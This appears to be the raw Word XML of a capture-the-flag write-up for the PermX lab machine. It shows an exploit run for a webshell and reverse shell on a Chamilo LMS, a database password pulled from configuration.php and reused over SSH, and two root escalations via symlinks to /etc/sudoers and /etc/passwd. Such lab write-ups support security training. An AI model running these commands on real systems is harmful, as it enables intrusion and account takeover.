    <w:p w14:paraId="7A67EB68" w14:textId="77777777" w:rsidR="007D5E3F" w:rsidRDefault="007D5E3F" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python3 main.py -u http://lms.permx.htb -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D4D1A4A" w14:textId="77777777" w:rsidR="00B54AC5" w:rsidRDefault="00B54AC5" w:rsidP="000C51AE">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A33475" w14:textId="2CE78CE1" w:rsidR="00B54AC5" w:rsidRDefault="00B54AC5" w:rsidP="00B54AC5">
      <w:r>
        <w:t xml:space="preserve">python3 main.py -u http://lms.permx.htb -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>revshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74414271" w14:textId="5308AE5E" w:rsidR="00583934" w:rsidRDefault="000D4400" w:rsidP="007D5E3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5430CC05" wp14:editId="72BE52F6">
            <wp:extent cx="6858000" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8760068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006858" name="Picture 87600685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01EB6" w14:textId="4A3499BF" w:rsidR="007D5E3F" w:rsidRDefault="00873763" w:rsidP="007D5E3F">
      <w:r>
        <w:t xml:space="preserve">In the listener validate who we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00DC7B0A">
        <w:t>,pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC7B0A">
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D49E9" w14:textId="3D173E7C" w:rsidR="004A5C4B" w:rsidRDefault="009F7C99" w:rsidP="009F7C99">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7339F1D2" wp14:editId="0C34D8D2">
            <wp:extent cx="6858000" cy="3451225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="264557242" name="Picture 5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557242" name="Picture 5" descr="A screenshot of a computer scree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FB0E8" w14:textId="77777777" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40877B64" w14:textId="77777777" w:rsidR="00FE265F" w:rsidRDefault="00FE265F" w:rsidP="00FE265F">
      <w:r>
        <w:t xml:space="preserve">Find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> install directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3694E52D" w14:textId="7514F853" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">find / -name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1610328C" w14:textId="181F8DDB" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>cd /var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chamilo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A8512FA" w14:textId="77777777" w:rsidR="00435460" w:rsidRDefault="00435460" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B283140" w14:textId="77777777" w:rsidR="00C910A2" w:rsidRDefault="00435460" w:rsidP="00C910A2">
      <w:r>
        <w:t>Find the configuration file location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42753290" w14:textId="44736CF8" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">find . -name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>configuration.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15BE83FA" w14:textId="2A1F2A57" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>cd app/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C313340" w14:textId="77777777" w:rsidR="000F1C4C" w:rsidRDefault="000F1C4C" w:rsidP="00DC7B0A">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5D0038" w14:textId="530E893D" w:rsidR="00C910A2" w:rsidRDefault="00F72B59" w:rsidP="007D5E3F">
      <w:r>
        <w:t>Password reuse maybe!?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B15BBD" w14:textId="52BA4912" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="008E3384">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">grep password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>configuration.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="575C4FAB" w14:textId="77777777" w:rsidR="003860CC" w:rsidRDefault="003860CC" w:rsidP="008E3384">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C77E058" w14:textId="573A4CA0" w:rsidR="00F27CD5" w:rsidRDefault="00F27CD5" w:rsidP="00CD4D5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="729A829E" wp14:editId="4C7C45C9">
            <wp:extent cx="5401429" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="138277908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779084" name="Picture 138277908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61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041E6" w14:textId="12384DAE" w:rsidR="00CD4D5E" w:rsidRDefault="004A5C4B" w:rsidP="00CD4D5E">
      <w:r>
        <w:t xml:space="preserve">password = </w:t>
      </w:r>
      <w:r w:rsidR="003860CC">
        <w:t>03F6lY3uXAP2bkW8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2CFF7" w14:textId="04A86E61" w:rsidR="00CD4D5E" w:rsidRDefault="006D46BA" w:rsidP="007D5E3F">
      <w:r>
        <w:t xml:space="preserve">Look in </w:t>
      </w:r>
      <w:r w:rsidR="004A641A">
        <w:t>/home or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A641A">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A641A">
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidR="008113C8">
        <w:t xml:space="preserve"> for user name ideas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C22AB" w14:textId="0C1AB2E2" w:rsidR="008113C8" w:rsidRDefault="008113C8" w:rsidP="007D5E3F">
      <w:r>
        <w:t xml:space="preserve">SSH to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Permx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0365D60C" w14:textId="199F5E5F" w:rsidR="004A5C4B" w:rsidRDefault="004A5C4B" w:rsidP="008113C8">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00991917">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>mtz@permx.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="733965BE" w14:textId="77777777" w:rsidR="00B459FC" w:rsidRDefault="00B459FC" w:rsidP="00B459FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF68231" w14:textId="14EAE006" w:rsidR="00B459FC" w:rsidRPr="00B459FC" w:rsidRDefault="00B459FC" w:rsidP="00B459FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>-------USER FLAG CAPTURE</w:t>
      </w:r>
      <w:r w:rsidR="00D514D4">
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE8FFA" w14:textId="77777777" w:rsidR="002D6414" w:rsidRDefault="002D6414" w:rsidP="002D6414">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mtz@permx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~$ sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EC10B" w14:textId="59B13DA5" w:rsidR="00584A35" w:rsidRDefault="00DB7613" w:rsidP="007D5E3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30B5437A" wp14:editId="02A90B46">
            <wp:extent cx="5274857" cy="2261832"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="175141416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414169" name="Picture 175141416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322" cy="226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546E4" w14:textId="18EBD727" w:rsidR="004A5C4B" w:rsidRDefault="005C080D" w:rsidP="004A5C4B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA9A1ED" wp14:editId="4ECE7483">
            <wp:extent cx="3941828" cy="6196084"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="229135806" name="Picture 93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135806" name="Picture 93" descr="A screenshot of a computer screen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675" cy="623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0B1D5" w14:textId="7C15C5C0" w:rsidR="007D52C7" w:rsidRDefault="004F2C77" w:rsidP="004A5C4B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D52C7">
        <w:t>PermX’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D52C7">
        <w:t xml:space="preserve"> configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032658A">
        <w:t>cleans up the user’s home directory every couple of minutes.  So</w:t>
      </w:r>
      <w:r w:rsidR="007D52C7">
        <w:t>, move fast!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C6E60" w14:textId="68714428" w:rsidR="00B54B26" w:rsidRDefault="008300AB" w:rsidP="004A5C4B">
      <w:r>
        <w:t xml:space="preserve">Option 1: </w:t>
      </w:r>
      <w:r w:rsidR="00D81938">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0019165E">
        <w:t>scalate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by adding to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36BD7D" w14:textId="30E1B127" w:rsidR="00026A08" w:rsidRDefault="00026A08" w:rsidP="00026A08">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>ln -s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00623897">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E106BCD" w14:textId="77777777" w:rsidR="00026A08" w:rsidRDefault="00026A08" w:rsidP="00026A08">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo /opt/acl.sh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704A05E" w14:textId="0E6AEAAE" w:rsidR="00026A08" w:rsidRPr="00026A08" w:rsidRDefault="00026A08" w:rsidP="00026A08">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00026A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>echo '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00026A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A7736A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00026A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ALL=(ALL:ALL</w:t>
      </w:r>
      <w:r w:rsidR="00A7736A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00026A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ALL'  </w:t>
      </w:r>
      <w:r w:rsidR="00623897">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00026A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67890A97" w14:textId="172B9FCA" w:rsidR="00026A08" w:rsidRDefault="00D6284A" w:rsidP="00026A08">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="263EFD5D" w14:textId="77777777" w:rsidR="00FE4AF0" w:rsidRDefault="00FE4AF0" w:rsidP="00026A08">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2144CF75" w14:textId="4AE7765D" w:rsidR="00026A08" w:rsidRDefault="00FE4AF0" w:rsidP="00F77248">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CB4A1A2" wp14:editId="3909FC49">
            <wp:extent cx="4109562" cy="2200559"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="17817324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732432" name="Picture 1" descr="A screenshot of a computer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308" cy="220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C79E8" w14:textId="4CE2C946" w:rsidR="003B3F3F" w:rsidRDefault="003B3F3F" w:rsidP="00B54B26"/>
    <w:p w14:paraId="0E981F75" w14:textId="59896BB7" w:rsidR="00DE25D1" w:rsidRDefault="00DE25D1" w:rsidP="00DE25D1">
      <w:r>
        <w:t xml:space="preserve">Option 2: escalate by adding </w:t>
      </w:r>
      <w:r w:rsidR="0099531E">
        <w:t>a new root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB0EF8" w14:textId="1B0C7D5A" w:rsidR="00B01753" w:rsidRDefault="00B01753" w:rsidP="00B01753">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>ln -s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0086033E">
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0048221F">
        <w:t>./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B88AD" w14:textId="614E5FE6" w:rsidR="00717FF8" w:rsidRDefault="00B01753" w:rsidP="00B01753">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo /opt/acl.sh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00112BB0">
        <w:t>attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A1E76" w14:textId="27F99951" w:rsidR="009755FC" w:rsidRDefault="009755FC" w:rsidP="00B01753">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">echo root3::0:0:root3:/root:/bin/bash &gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0048221F">
        <w:t>./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F9C1C" w14:textId="6AE24FD1" w:rsidR="007B0589" w:rsidRDefault="007B0589" w:rsidP="00B01753">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C174CA6" w14:textId="77777777" w:rsidR="00D81938" w:rsidRDefault="00D81938" w:rsidP="00B01753">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A8D3A1" w14:textId="4A569485" w:rsidR="00B147C8" w:rsidRPr="00B147C8" w:rsidRDefault="004551B7" w:rsidP="00B147C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768C9D03" wp14:editId="081105B0">
            <wp:extent cx="4872251" cy="2553575"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1741839553" name="Picture 9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839553" name="Picture 9" descr="A screenshot of a computer program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626" cy="25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260CE" w14:textId="5A8E3B12" w:rsidR="0091151D" w:rsidRPr="00B459FC" w:rsidRDefault="0091151D" w:rsidP="0091151D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>-------ROOT FLAG CAPTURE------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D45DDE" w14:textId="77777777" w:rsidR="00B147C8" w:rsidRPr="00B147C8" w:rsidRDefault="00B147C8" w:rsidP="00B147C8"/>
    <w:p w14:paraId="7321EBD5" w14:textId="45667F16" w:rsidR="00B147C8" w:rsidRPr="00B147C8" w:rsidRDefault="00F1764A" w:rsidP="00F1764A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8148DB" w14:textId="1F86A9DB" w:rsidR="00DE718C" w:rsidRDefault="009F358D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2EF0DB" wp14:editId="7FDAC12B">
            <wp:extent cx="5559658" cy="3331162"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="1847571052" name="Picture 9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571052" name="Picture 94" descr="A screenshot of a computer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746" cy="334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718C" w:rsidSect="003646C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A03DB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2D6F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422431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7C8"/>
    <w:rsid w:val="0000037C"/>
    <w:rsid w:val="00021D5C"/>
    <w:rsid w:val="00026A08"/>
    <w:rsid w:val="00032CD7"/>
    <w:rsid w:val="00047630"/>
    <w:rsid w:val="00071107"/>
    <w:rsid w:val="000767DD"/>
    <w:rsid w:val="00090AF8"/>
    <w:rsid w:val="000B4206"/>
    <w:rsid w:val="000C29E2"/>
    <w:rsid w:val="000C51AE"/>
    <w:rsid w:val="000D4400"/>
    <w:rsid w:val="000D5ED4"/>
    <w:rsid w:val="000E204A"/>
    <w:rsid w:val="000F1C4C"/>
    <w:rsid w:val="000F4C4A"/>
    <w:rsid w:val="00112BB0"/>
    <w:rsid w:val="00116427"/>
    <w:rsid w:val="00134CF9"/>
    <w:rsid w:val="001545E5"/>
    <w:rsid w:val="0017598D"/>
    <w:rsid w:val="00186862"/>
    <w:rsid w:val="0019093D"/>
    <w:rsid w:val="0019165E"/>
    <w:rsid w:val="001A4F64"/>
    <w:rsid w:val="001B0CB0"/>
    <w:rsid w:val="001C0EC8"/>
    <w:rsid w:val="001C234C"/>
    <w:rsid w:val="001E6682"/>
    <w:rsid w:val="001F72BE"/>
    <w:rsid w:val="00212D59"/>
    <w:rsid w:val="00226064"/>
    <w:rsid w:val="0025308C"/>
    <w:rsid w:val="002702E5"/>
    <w:rsid w:val="00283D5A"/>
    <w:rsid w:val="00285E3F"/>
    <w:rsid w:val="00292EA9"/>
    <w:rsid w:val="002B0FE8"/>
    <w:rsid w:val="002D6414"/>
    <w:rsid w:val="002E6A47"/>
    <w:rsid w:val="002F462D"/>
    <w:rsid w:val="00310792"/>
    <w:rsid w:val="00310DF8"/>
    <w:rsid w:val="003170A1"/>
    <w:rsid w:val="00324C3B"/>
    <w:rsid w:val="0032658A"/>
    <w:rsid w:val="00352AC1"/>
    <w:rsid w:val="003646CF"/>
    <w:rsid w:val="00384B7A"/>
    <w:rsid w:val="003860CC"/>
    <w:rsid w:val="00386F95"/>
    <w:rsid w:val="0039229C"/>
    <w:rsid w:val="003B3F3F"/>
    <w:rsid w:val="003C2ABB"/>
    <w:rsid w:val="003D4489"/>
    <w:rsid w:val="0040076C"/>
    <w:rsid w:val="00406B6D"/>
    <w:rsid w:val="004113F4"/>
    <w:rsid w:val="00417781"/>
    <w:rsid w:val="004317AE"/>
    <w:rsid w:val="00435460"/>
    <w:rsid w:val="004408D5"/>
    <w:rsid w:val="004551B7"/>
    <w:rsid w:val="004571E3"/>
    <w:rsid w:val="004671CD"/>
    <w:rsid w:val="0048221F"/>
    <w:rsid w:val="00482FC9"/>
    <w:rsid w:val="004A5C4B"/>
    <w:rsid w:val="004A641A"/>
    <w:rsid w:val="004C6E73"/>
    <w:rsid w:val="004F1617"/>
    <w:rsid w:val="004F2C77"/>
    <w:rsid w:val="00505690"/>
    <w:rsid w:val="00520382"/>
    <w:rsid w:val="00520847"/>
    <w:rsid w:val="00583934"/>
    <w:rsid w:val="00584A35"/>
    <w:rsid w:val="005A54F3"/>
    <w:rsid w:val="005A61A6"/>
    <w:rsid w:val="005A6EF8"/>
    <w:rsid w:val="005A78E4"/>
    <w:rsid w:val="005B04E8"/>
    <w:rsid w:val="005B25B7"/>
    <w:rsid w:val="005C080D"/>
    <w:rsid w:val="005D3048"/>
    <w:rsid w:val="005E75B5"/>
    <w:rsid w:val="00603359"/>
    <w:rsid w:val="00616958"/>
    <w:rsid w:val="00623897"/>
    <w:rsid w:val="00626345"/>
    <w:rsid w:val="006267D0"/>
    <w:rsid w:val="00645A79"/>
    <w:rsid w:val="006475F8"/>
    <w:rsid w:val="0065021A"/>
    <w:rsid w:val="00653653"/>
    <w:rsid w:val="00676335"/>
    <w:rsid w:val="006908AD"/>
    <w:rsid w:val="006918C6"/>
    <w:rsid w:val="006949D0"/>
    <w:rsid w:val="0069636D"/>
    <w:rsid w:val="006A5447"/>
    <w:rsid w:val="006B1B96"/>
    <w:rsid w:val="006B6C2B"/>
    <w:rsid w:val="006D03A8"/>
    <w:rsid w:val="006D46BA"/>
    <w:rsid w:val="00717FF8"/>
    <w:rsid w:val="00727B94"/>
    <w:rsid w:val="00732389"/>
    <w:rsid w:val="007548B8"/>
    <w:rsid w:val="00772094"/>
    <w:rsid w:val="007A6084"/>
    <w:rsid w:val="007B0589"/>
    <w:rsid w:val="007D3AF8"/>
    <w:rsid w:val="007D52C7"/>
    <w:rsid w:val="007D5E3F"/>
    <w:rsid w:val="008062D9"/>
    <w:rsid w:val="00806F9C"/>
    <w:rsid w:val="008113C8"/>
    <w:rsid w:val="00823644"/>
    <w:rsid w:val="008300AB"/>
    <w:rsid w:val="00834178"/>
    <w:rsid w:val="00835FB6"/>
    <w:rsid w:val="008412DF"/>
    <w:rsid w:val="00842AE8"/>
    <w:rsid w:val="0086033E"/>
    <w:rsid w:val="00866555"/>
    <w:rsid w:val="00872506"/>
    <w:rsid w:val="00873763"/>
    <w:rsid w:val="00873818"/>
    <w:rsid w:val="008A4A01"/>
    <w:rsid w:val="008B366C"/>
    <w:rsid w:val="008B5A2D"/>
    <w:rsid w:val="008D6AB6"/>
    <w:rsid w:val="008E3384"/>
    <w:rsid w:val="0091151D"/>
    <w:rsid w:val="009335BB"/>
    <w:rsid w:val="00935680"/>
    <w:rsid w:val="00942822"/>
    <w:rsid w:val="00950F5C"/>
    <w:rsid w:val="00952943"/>
    <w:rsid w:val="009653CA"/>
    <w:rsid w:val="009728A1"/>
    <w:rsid w:val="00974AD4"/>
    <w:rsid w:val="00974DB0"/>
    <w:rsid w:val="009755FC"/>
    <w:rsid w:val="0099531E"/>
    <w:rsid w:val="009A2F99"/>
    <w:rsid w:val="009E3C95"/>
    <w:rsid w:val="009F049E"/>
    <w:rsid w:val="009F358D"/>
    <w:rsid w:val="009F7C99"/>
    <w:rsid w:val="00A24911"/>
    <w:rsid w:val="00A33162"/>
    <w:rsid w:val="00A7736A"/>
    <w:rsid w:val="00A92725"/>
    <w:rsid w:val="00AF2AFF"/>
    <w:rsid w:val="00B01753"/>
    <w:rsid w:val="00B040FA"/>
    <w:rsid w:val="00B05527"/>
    <w:rsid w:val="00B0644B"/>
